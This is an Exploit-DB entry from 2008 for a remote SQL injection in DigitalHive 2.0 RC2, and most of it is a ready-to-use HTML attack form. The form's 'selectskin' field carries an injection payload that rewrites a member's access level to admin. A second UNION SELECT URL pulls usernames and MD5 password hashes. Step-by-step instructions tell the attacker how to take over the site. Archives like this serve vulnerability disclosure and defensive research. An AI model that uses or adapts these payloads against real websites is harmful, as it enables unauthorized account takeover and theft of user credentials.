DigitalHive <= 2.0 RC2 user_id Remote SQL Injection Exploit

2008-01-11T00:00:00
ID EDB-ID:4887
Type exploitdb
Reporter j0j0
Modified 2008-01-11T00:00:00

Description

DigitalHive <= 2.0 RC2 (user_id) Remote SQL Injection Exploit. CVE-2008-0290. Webapps exploit for php platform

                                        
                                            &lt;!--
    Hive v2.0 RC2 Remote SQL Injection
    c0ded by j0j0
--&gt;
&lt;html&gt;
&lt;head&gt;
&lt;style type="text/css"&gt;
body {
    margin:3%;
    font-size:10px;
    color:#FFFFFF;
    font-family:Verdana,Arial;
    background-color:#1a1a1a;
    text-align: center;
}
input {
    background:#303030;
    color:#FFFFFF;
    font-family:Verdana,Arial;
    font-size:10px;
    vertical-align:middle;
    border-left:1px solid #5d5d5d;
    border-right:1px solid #121212;
    border-bottom:1px solid #121212;
    border-top:1px solid #5d5d5d;
    padding: 3px;
    margin: 2px;
}
input[type=text] {
    width: 200px;
}
textarea {
    background:#303030;
    color:#FFFFFF;
    font-family:Verdana,Arial;
    font-size:10px;
    vertical-align:middle;
    border-left:1px solid #121212;
    border-right:1px solid #5d5d5d;
    border-bottom:1px solid #5d5d5d;
    border-top:1px solid #121212;
}
table td {
    font-size: 10px;
    font-family: Verdana, Arial;
}
h3 { color: #CC0000; }
a {
    color: #999999;
    text-decoration: none;
    font-weight: bold;
}
#exploit {
    font-family: Courier New, sans-ms;
    font-size: 12px;
    color: #00FF00;
    width: 400px;
    text-align: left;
}
&lt;/style&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;center&gt;
&lt;h3&gt;Hive v2.0 RC2 Remote SQL Injection&lt;br /&gt;&lt;br /&gt;-= c0ded by j0j0 =-&lt;/h3&gt;
&lt;br /&gt;
&lt;p&gt;you must first create an account, and log in.&lt;br /&gt;
then you can send exploit&lt;br /&gt;
&lt;span style="color:#cc0000;"&gt;don't forget to change the action="" URL of this form&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&nbsp;&lt;/p&gt;

&lt;table width="600px" cellspacing="1"&gt;
    &lt;tr&gt;
        &lt;td width="20%" class="td5_2"&gt;Username&lt;/td&gt;
        &lt;td class="td5_1"&gt;&lt;input type="text" name="id" value="admin" /&gt;&lt;/td&gt;
        &lt;td&gt;you will use this username to login&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td class="td5_2"&gt;Password&lt;/td&gt;
        &lt;td class="td5_1"&gt;&lt;input type="text" name="password" value="admin" /&gt;&lt;/td&gt;
        &lt;td&gt;you will use this password to login&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td class="td5_2"&gt;Mail&lt;/td&gt;
        &lt;td class="td5_1"&gt;&lt;input type="text" class="texte" name="mail" size="24" value="You_Were_H4ck3d@microsoft.com" /&gt;&lt;/td&gt;
        &lt;td&gt;email doesn't have importance&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td class="td5_2"&gt;SQL Injection&lt;/td&gt;
        &lt;td colspan="3" class="td5_1"&gt;
            &lt;input name="selectskin" type="text" value="purpletech', niveau_num=4 WHERE num=2 /*"/&gt;
        &lt;/td&gt;
    &lt;/tr&gt;
&lt;/table&gt;
&lt;p&gt;purpletech', niveau_num=4 WHERE num=2 /*  &lt;-- niveau_num is for admin access / num is the member id (default admin id is 2)&lt;br /&gt;&lt;/p&gt;
&lt;br&gt;
&lt;input type="submit" name="submitButtonName" value="Attack"&gt;
&lt;p&gt;&nbsp;&lt;/p&gt;
&lt;p&gt;Now you are admin, logout and re-login with new username/password&lt;/p&gt;
&lt;p&gt;There is another one injection   :
&lt;div style="max-width:500px;"&gt;
    http://{HOST}/{PATH}/base.php?page=gestion_membre.php&var=profil&user_id=-9999999'/**/UNION/**/SELECT/**/

    0,concat(nick,char(58),pass),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/FROM/**/_user/**/WHERE&lt;br /&gt;/**/{SQL_PREFIX}_user.num={MEMBER_ID}/**//*&lt;br /&gt;
&lt;/div&gt;
&lt;br /&gt;&lt;br /&gt;
Change {HOST}, {PATH}, {SQL_PREFIX} and {MEMBER_ID}&lt;br /&gt;
then look at the "Pseudonyme" field, you've got LOGIN:MD5_PASSWORD)&lt;/p&gt;
&lt;!--
Hidden inputs
--&gt;
&lt;input type="hidden" class="texte" name="nom" size="24" value="h4ck3d" &gt;
&lt;input type="hidden" class="texte" name="prenom" size="24" value="h4ck3d" &gt;
&lt;input type="hidden" class="texte" name="age" size="24" value="h4ck3d"  &gt;
&lt;input type="hidden" class="texte" name="icq" size="24" value="h4ck3d"  &gt;
&lt;input type="hidden" class="texte" name="adresse" size="24" value="h4ck3d"  &gt;
&lt;input type="hidden" class="texte" name="msn" size="24" value="h4ck3d"  &gt;
&lt;input type="hidden" class="texte" name="aim" size="24" value="h4ck3d"  &gt;
&lt;input type="hidden" class="texte" name="hobbie" size="24" value="h4ck3d"  &gt;
&lt;input type="hidden" class="texte" name="yahoo" size="24" value="h4ck3d"  &gt;
&lt;input type="hidden" class="texte" name="site" size="24" value="h4ck3d"  &gt;
&lt;input type="hidden" class="texte" name="text" size="24" value="h4ck3d"  &gt;
&lt;input type="hidden" class="texte" name="selectlangue" size="24" value="h4ck3d"  &gt;
&lt;input type="hidden" value="false" name="online"  &gt;
&lt;/form&gt;
&lt;/center&gt;
&lt;/body&gt;
&lt;/html&gt;

# milw0rm.com [2008-01-11]